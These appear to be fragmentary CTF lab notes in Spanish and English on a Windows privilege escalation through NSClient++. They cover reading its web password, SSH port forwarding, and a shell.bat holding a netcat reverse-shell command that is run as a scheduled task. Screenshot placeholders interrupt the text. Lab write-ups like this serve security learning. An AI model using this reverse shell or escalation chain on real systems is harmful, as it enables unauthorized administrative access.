NSClient++

Version

cmd /c "C:\Program Files\NSClient++\nscp.exe" --version

cmd /c "C:\Program Files\NSClient++\nscp.exe" web -- password --display

searchsploit NSClient

Aparte del privesc de searchsploit hay otro de la misma versión:
Windows Local Privilege Escalation

Local Port Forwarding

ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443

shell.bat

\Test\nc.exe 10.10.10.184 4444 -e cmd

Subimos shell.bat y nc.exe a C:\programdata

In the NSClient++ GUI, first I’ll associate my script with a command by clicking Settings > external scripts > scripts, and then “+Add new”.!

!Apuntes/()01598301Fotos/image-20200413124942222 1.webp

Now under scheduler > schedules I’ll hit the “+Add new” button. I need to add two things here. First, I’ll edit the section to add a new name, and then give it an interval of 10 seconds:
image-20200413125324355

After hitting Add, I’ll change edit the form, and then Add again:
image-20200413125404288

Now df shows up as a scheduled task, and I can see it has both key/values:
image-20200620065935852